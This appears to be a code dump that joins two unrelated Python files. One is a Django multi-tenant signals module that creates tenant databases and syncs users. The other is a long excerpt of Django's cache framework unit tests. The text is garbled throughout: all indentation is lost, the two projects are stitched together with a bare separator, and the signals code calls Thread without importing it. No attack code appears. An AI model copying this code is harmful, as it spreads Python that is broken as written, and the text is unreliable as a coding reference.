from multi_tenant.tenant.models import Tenant, GlobalUser
from django.db.models.signals import post_save # 另外一个内置的常用信号
import logging
from django.dispatch import receiver
from multi_tenant.tenant import get_tenant_model, get_tenant_user_model
Tenant = get_tenant_model()
logger = logging.getLogger('django.request')
@receiver(post_save, sender=Tenant)
def create_data_handler(sender, signal, instance, created, **kwargs):
if created:
try:
instance.create_database()
logger.info(f'create database : [{instance.db_name}] successfuly for {instance.code}')
thread = Thread(target=migrate,args=[instance.code])
thread.start()
except Exception as e:
logger.error(e)
instance.delete(force=True)
def migrate(database: str):
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
logger.error('migrate fail')
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(['manage.py', 'migrate', f'--database={database}'])
logger.info('migrate successfuly!')
@receiver(post_save, sender=GlobalUser)
def assign_user_handler(sender, signal, instance, created, **kwargs):
if instance.tenant:
TenantUser = get_tenant_user_model()
TenantUser.objects.using(instance.tenant.code).get_or_create(
defaults={
'is_active':instance.is_active,
'is_staff':instance.is_staff,
'is_superuser':instance.is_superuser
},
username=instance.username,
)
|
tests.py
|
# Unit tests for cache framework
# Uses whatever cache backend is set in the test settings file.
import copy
import io
import os
import pickle
import re
import shutil
import tempfile
import threading
import time
import unittest
import warnings
from unittest import mock
from django.conf import settings
from django.core import management, signals
from django.core.cache import (
DEFAULT_CACHE_ALIAS, CacheKeyWarning, cache, caches,
)
from django.core.cache.utils import make_template_fragment_key
from django.db import close_old_connections, connection, connections
from django.http import (
HttpRequest, HttpResponse, HttpResponseNotModified, StreamingHttpResponse,
)
from django.middleware.cache import (
CacheMiddleware, FetchFromCacheMiddleware, UpdateCacheMiddleware,
)
from django.middleware.csrf import CsrfViewMiddleware
from django.template import engines
from django.template.context_processors import csrf
from django.template.response import TemplateResponse
from django.test import (
RequestFactory, SimpleTestCase, TestCase, TransactionTestCase,
override_settings,
)
from django.test.signals import setting_changed
from django.utils import timezone, translation
from django.utils.cache import (
get_cache_key, learn_cache_key, patch_cache_control, patch_vary_headers,
)
from django.views.decorators.cache import cache_page
from .models import Poll, expensive_calculation
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
class Unpicklable:
def __getstate__(self):
raise pickle.PickleError()
@override_settings(CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
})
class DummyCacheTests(SimpleTestCase):
# The Dummy cache backend doesn't really behave like a test backend,
# so it has its own test case.
def test_simple(self):
"Dummy cache backend ignores cache set calls"
cache.set("key", "value")
self.assertIsNone(cache.get("key"))
def test_add(self):
"Add doesn't do anything in dummy cache backend"
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertTrue(result)
self.assertIsNone(cache.get("addkey1"))
def test_non_existent(self):
"Nonexistent keys aren't found in the dummy cache backend"
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
"get_many returns nothing for the dummy cache backend"
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {})
def test_delete(self):
"Cache deletion is transparently ignored on the dummy cache backend"
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertIsNone(cache.get("key1"))
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_has_key(self):
"The has_key method doesn't ever return True for the dummy cache backend"
cache.set("hello1", "goodbye1")
self.assertFalse(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
def test_in(self):
"The in operator doesn't ever return True for the dummy cache backend"
cache.set("hello2", "goodbye2")
self.assertNotIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
"Dummy cache values can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr('answer')
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
"Dummy cache values can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr('answer')
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_data_types(self):
"All data types are ignored equally by the dummy cache"
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertIsNone(cache.get("stuff"))
def test_expiration(self):
"Expiration has no effect on the dummy cache"
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertIsNone(cache.get("expire2"))
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
"Unicode values are ignored by the dummy cache"
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertIsNone(cache.get(key))
def test_set_many(self):
"set_many does nothing for the dummy cache backend"
cache.set_many({'a': 1, 'b': 2})
cache.set_many({'a': 1, 'b': 2}, timeout=2, version='1')
def test_delete_many(self):
"delete_many does nothing for the dummy cache backend"
cache.delete_many(['a', 'b'])
def test_clear(self):
"clear does nothing for the dummy cache backend"
cache.clear()
def test_incr_version(self):
"Dummy cache versions can't be incremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.incr_version('answer')
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
"Dummy cache versions can't be decremented"
cache.set('answer', 42)
with self.assertRaises(ValueError):
cache.decr_version('answer')
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist')
def test_get_or_set(self):
self.assertEqual(cache.get_or_set('mykey', 'default'), 'default')
self.assertEqual(cache.get_or_set('mykey', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'default'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'default')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'default')
def custom_key_func(key, key_prefix, version):
"A customized cache key function"
return 'CUSTOM-' + '-'.join([key_prefix, str(version), key])
_caches_setting_base = {
'default': {},
'prefix': {'KEY_PREFIX': 'cacheprefix{}'.format(os.getpid())},
'v2': {'VERSION': 2},
'custom_key': {'KEY_FUNCTION': custom_key_func},
'custom_key2': {'KEY_FUNCTION': 'cache.tests.custom_key_func'},
'cull': {'OPTIONS': {'MAX_ENTRIES': 30}},
'zero_cull': {'OPTIONS': {'CULL_FREQUENCY': 0, 'MAX_ENTRIES': 30}},
}
def caches_setting_for_tests(base=None, exclude=None, **params):
# `base` is used to pull in the memcached config from the original settings,
# `exclude` is a set of cache names denoting which `_caches_setting_base` keys
# should be omitted.
# `params` are test specific overrides and `_caches_settings_base` is the
# base config for the tests.
# This results in the following search order:
# params -> _caches_setting_base -> base
base = base or {}
exclude = exclude or set()
setting = {k: base.copy() for k in _caches_setting_base if k not in exclude}
for key, cache_params in setting.items():
cache_params.update(_caches_setting_base[key])
cache_params.update(params)
return setting
class BaseCacheTests:
# A common set of tests to apply to all cache backends
def setUp(self):
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_simple(self):
# Simple cache set/get works
cache.set("key", "value")
self.assertEqual(cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
cache.add("addkey1", "value")
result = cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(cache.get("addkey1"), "value")
def test_prefix(self):
# Test for same cache key conflicts between shared backend
cache.set('somekey', 'value')
# should not be set in the prefixed cache
self.assertFalse(caches['prefix'].has_key('somekey'))
caches['prefix'].set('somekey', 'value2')
self.assertEqual(cache.get('somekey'), 'value')
self.assertEqual(caches['prefix'].get('somekey'), 'value2')
def test_non_existent(self):
"""Nonexistent cache keys return as None/default."""
self.assertIsNone(cache.get("does_not_exist"))
self.assertEqual(cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
cache.set('a', 'a')
cache.set('b', 'b')
cache.set('c', 'c')
cache.set('d', 'd')
self.assertEqual(cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_delete(self):
# Cache keys can be deleted
cache.set("key1", "spam")
cache.set("key2", "eggs")
self.assertEqual(cache.get("key1"), "spam")
cache.delete("key1")
self.assertIsNone(cache.get("key1"))
self.assertEqual(cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
cache.set("hello1", "goodbye1")
self.assertTrue(cache.has_key("hello1"))
self.assertFalse(cache.has_key("goodbye1"))
cache.set("no_expiry", "here", None)
self.assertTrue(cache.has_key("no_expiry"))
def test_in(self):
# The in operator can be used to inspect cache contents
cache.set("hello2", "goodbye2")
self.assertIn("hello2", cache)
self.assertNotIn("goodbye2", cache)
def test_incr(self):
# Cache values can be incremented
cache.set('answer', 41)
self.assertEqual(cache.incr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.incr('answer', 10), 52)
self.assertEqual(cache.get('answer'), 52)
self.assertEqual(cache.incr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.incr('does_not_exist')
def test_decr(self):
# Cache values can be decremented
cache.set('answer', 43)
self.assertEqual(cache.decr('answer'), 42)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.decr('answer', 10), 32)
self.assertEqual(cache.get('answer'), 32)
self.assertEqual(cache.decr('answer', -10), 42)
with self.assertRaises(ValueError):
cache.decr('does_not_exist')
def test_close(self):
self.assertTrue(hasattr(cache, 'close'))
cache.close()
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
cache.set("stuff", stuff)
self.assertEqual(cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
cache.set('question', my_poll)
cached_poll = cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
cache.set('expire1', 'very quickly', 1)
cache.set('expire2', 'very quickly', 1)
cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertIsNone(cache.get("expire1"))
cache.add("expire2", "newvalue")
self.assertEqual(cache.get("expire2"), "newvalue")
self.assertFalse(cache.has_key("expire3"))
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii2': {'x': 1}
}
# Test `set`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.set(key, value)
self.assertEqual(cache.get(key), value)
# Test `add`
for (key, value) in stuff.items():
with self.subTest(key=key):
cache.delete(key)
cache.add(key, value)
self.assertEqual(cache.get(key), value)
# Test `set_many`
for (key, value) in stuff.items():
cache.delete(key)
cache.set_many(stuff)
for (key, value) in stuff.items():
with self.subTest(key=key):
self.assertEqual(cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cacheable
from zlib import compress, decompress
value = 'value_to_be_compressed'
compressed_value = compress(value.encode())
# Test set
cache.set('binary1', compressed_value)
compressed_result = cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test add
cache.add('binary1-add', compressed_value)
compressed_result = cache.get('binary1-add')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
# Test set_many
cache.set_many({'binary1-set_many': compressed_value})
compressed_result = cache.get('binary1-set_many')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result).decode())
def test_set_many(self):
# Multiple keys can be set using set_many
cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(cache.get("key1"), "spam")
self.assertEqual(cache.get("key2"), "eggs")
def test_set_many_returns_empty_list_on_success(self):
"""set_many() returns an empty list when all keys are inserted."""
failing_keys = cache.set_many({'key1': 'spam', 'key2': 'eggs'})
self.assertEqual(failing_keys, [])
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
cache.set_many({"key1": "spam", "key2": "eggs"}, 1)
time.sleep(2)
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_delete_many(self):
# Multiple keys can be deleted using delete_many
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.set("key3", "ham")
cache.delete_many(["key1", "key2"])
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
self.assertEqual(cache.get("key3"), "ham")
def test_clear(self):
# The cache can be emptied using clear
cache.set("key1", "spam")
cache.set("key2", "eggs")
cache.clear()
self.assertIsNone(cache.get("key1"))
self.assertIsNone(cache.get("key2"))
def test_long_timeout(self):
"""
Followe memcached's convention where a timeout greater than 30 days is
treated as an absolute expiration timestamp instead of a relative
offset (#12399).
"""
cache.set('key1', 'eggs', 60 * 60 * 24 * 30 + 1) # 30 days + 1 second
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key2'), 'ham')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 60 * 60 * 24 * 30 + 1)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_forever_timeout(self):
"""
Passing in None into timeout results in a value that is cached forever
"""
cache.set('key1', 'eggs', None)
self.assertEqual(cache.get('key1'), 'eggs')
cache.add('key2', 'ham', None)
self.assertEqual(cache.get('key2'), 'ham')
added = cache.add('key1', 'new eggs', None)
self.assertIs(added, False)
self.assertEqual(cache.get('key1'), 'eggs')
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, None)
self.assertEqual(cache.get('key3'), 'sausage')
self.assertEqual(cache.get('key4'), 'lobster bisque')
def test_zero_timeout(self):
"""
Passing in zero into timeout results in a value that is not cached
"""
cache.set('key1', 'eggs', 0)
self.assertIsNone(cache.get('key1'))
cache.add('key2', 'ham', 0)
self.assertIsNone(cache.get('key2'))
cache.set_many({'key3': 'sausage', 'key4': 'lobster bisque'}, 0)
self.assertIsNone(cache.get('key3'))
self.assertIsNone(cache.get('key4'))
def test_float_timeout(self):
# Make sure a timeout given as a float doesn't crash anything.
cache.set("key1", "spam", 100.2)
self.assertEqual(cache.get("key1"), "spam")
def _perform_cull_test(self, cull_cache, initial_count, final_count):
# Create initial cache key entries. This will overflow the cache,
# causing a cull.
for i in range(1, initial_count):
cull_cache.set('cull%d' % i, 'value', 1000)
count = 0
# Count how many keys are left in the cache.
for i in range(1, initial_count):
if cull_cache.has_key('cull%d' % i):
count += 1
self.assertEqual(count, final_count)
def test_cull(self):
self._perform_cull_test(caches['cull'], 50, 29)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 19)
def _perform_invalid_key_test(self, key, expected_warning):
"""
All the builtin backends (except memcached, see below) should warn on
keys that would be refused by memcached. This encourages portable
caching code without making it too difficult to use production backends
with more liberal key rules. Refs #6447.
"""
# mimic custom ``make_key`` method being defined since the default will
# never show the below warnings
def func(key, *args):
return key
old_func = cache.key_func
cache.key_func = func
try:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
cache.set(key, 'value')
self.assertEqual(len(w), 1)
self.assertIsInstance(w[0].message, CacheKeyWarning)
self.assertEqual(str(w[0].message.args[0]), expected_warning)
finally:
cache.key_func = old_func
def test_invalid_key_characters(self):
# memcached doesn't allow whitespace or control characters in keys.
key = 'key with spaces and 清'
expected_warning = (
"Cache key contains characters that will cause errors if used "
"with memcached: %r" % key
)
self._perform_invalid_key_test(key, expected_warning)
def test_invalid_key_length(self):
# memcached limits key length to 250.
key = ('a' * 250) + '清'
expected_warning = (
'Cache key will cause errors if used with memcached: '
'%r (longer than %s)' % (key, 250)
)
self._perform_invalid_key_test(key, expected_warning)
def test_cache_versioning_get_set(self):
# set, using default version = 1
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(cache.get('answer1', version=1), 42)
self.assertIsNone(cache.get('answer1', version=2))
self.assertIsNone(caches['v2'].get('answer1'))
self.assertEqual(caches['v2'].get('answer1', version=1), 42)
self.assertIsNone(caches['v2'].get('answer1', version=2))
# set, default version = 1, but manually override version = 2
cache.set('answer2', 42, version=2)
self.assertIsNone(cache.get('answer2'))
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
# v2 set, using default version = 2
caches['v2'].set('answer3', 42)
self.assertIsNone(cache.get('answer3'))
self.assertIsNone(cache.get('answer3', version=1))
self.assertEqual(cache.get('answer3', version=2), 42)
self.assertEqual(caches['v2'].get('answer3'), 42)
self.assertIsNone(caches['v2'].get('answer3', version=1))
self.assertEqual(caches['v2'].get('answer3', version=2), 42)
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set('answer4', 42, version=1)
self.assertEqual(cache.get('answer4'), 42)
self.assertEqual(cache.get('answer4', version=1), 42)
self.assertIsNone(cache.get('answer4', version=2))
self.assertIsNone(caches['v2'].get('answer4'))
self.assertEqual(caches['v2'].get('answer4', version=1), 42)
self.assertIsNone(caches['v2'].get('answer4', version=2))
def test_cache_versioning_add(self):
# add, default version = 1, but manually override version = 2
cache.add('answer1', 42, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertIsNone(cache.get('answer2', version=1))
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertIsNone(cache.get('answer3', version=2))
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertIsNone(cache.get('answer1', version=1))
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertIsNone(cache.get('answer2', version=2))
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertIsNone(cache.get('answer3', version=2))
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertIsNone(cache.get('answer4', version=1))
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1), {'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']), {'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2), {'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']), {'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2), {'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1), {'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertIsNone(cache.get('answer', version=3))
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertIsNone(cache.get('answer', version=2))
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertIsNone(caches['v2'].get('answer2', version=3))
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertIsNone(caches['v2'].get('answer2', version=2))
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
with self.assertRaises(ValueError):
cache.incr_version('does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertIsNone(cache.get('answer'))
self.assertIsNone(cache.get('answer', version=1))
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertIsNone(cache.get('answer', version=2))
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertIsNone(caches['v2'].get('answer2', version=1))
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertIsNone(caches['v2'].get('answer2'))
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertIsNone(caches['v2'].get('answer2', version=2))
with self.assertRaises(ValueError):
cache.decr_version('does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertIsNone(caches['custom_key'].get('answer1'))
self.assertIsNone(caches['custom_key2'].get('answer1'))
caches['custom_key'].set('answer2', 42)
self.assertIsNone(cache.get('answer2'))
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpicklable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
# Shouldn't fail silently if trying to cache an unpicklable type.
with self.assertRaises(pickle.PickleError):
cache.add('unpicklable', Unpicklable())
def test_set_fail_on_pickleerror(self):
with self.assertRaises(pickle.PickleError):
cache.set('unpicklable', Unpicklable())
def test_get_or_set(self):
self.assertIsNone(cache.get('projector'))
self.assertEqual(cache.get_or_set('projector', 42), 42)
self.assertEqual(cache.get('projector'), 42)
self.assertEqual(cache.get_or_set('null', None), None)
def test_get_or_set_callable(self):
def my_callable():
return 'value'
self.assertEqual(cache.get_or_set('mykey', my_callable), 'value')
self.assertEqual(cache.get_or_set('mykey', my_callable()), 'value')
def test_get_or_set_version(self):
msg = "get_or_set() missing 1 required positional argument: 'default'"
cache.get_or_set('brian', 1979, version=2)
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian')
with self.assertRaisesMessage(TypeError, msg):
cache.get_or_set('brian', version=1)
self.assertIsNone(cache.get('brian', version=1))
self.assertEqual(cache.get_or_set('brian', 42, version=1), 42)
